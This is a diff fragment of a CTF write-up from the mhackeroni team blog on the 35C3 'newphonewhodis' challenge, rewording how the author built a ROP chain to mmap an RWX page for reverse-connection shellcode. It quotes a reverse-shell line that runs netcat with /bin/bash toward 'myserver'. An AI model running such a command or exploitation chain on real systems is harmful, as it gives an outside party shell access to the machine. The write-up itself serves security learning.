mhackeroni/mhackeroni.github.io/archive/_posts/2018-12-30-35c3ctf-newphonewhodis.md

 system("nc myserver 9999 -e /bin/bash");
 ```

-`system` was not in the .got so I need to do some computation from a value in the got, this stuff is hard while ropping, so the exploitation plan was: let's map some executable address and write a shellcode that does a reverse connection.
+`system` was not in the .got so I need to do some computation from a value in the got to get the address for `system`.
+This stuff is hard while ropping, so the exploitation plan was slightly different: Let's map some executable address and write a shellcode that does a reverse connection.

 So, I collected a few gadgets and built the ropachain that execute a `mmap` on an address the I can choose.
 Permissions for this new page are of course `RWX`.